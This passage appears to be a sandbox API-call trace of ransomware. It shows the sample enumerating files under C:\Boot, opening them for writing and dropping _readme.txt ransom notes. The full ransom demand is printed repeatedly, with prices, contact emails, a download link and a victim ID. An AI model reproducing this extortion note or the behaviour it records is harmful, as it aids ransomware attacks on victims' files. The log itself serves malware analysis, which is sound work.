ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.561] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.561] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.561] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0201.561] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.561] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.562] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.562] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.562] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.566] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0201.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.566] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.566] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.566] PathFindFileNameW (pszPath="") returned="" [0201.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.566] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.567] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.567] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.567] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.567] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0201.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.567] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0201.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.568] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.568] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.568] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.568] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.568] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.568] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.569] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0201.569] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.569] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.569] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.569] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.569] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) 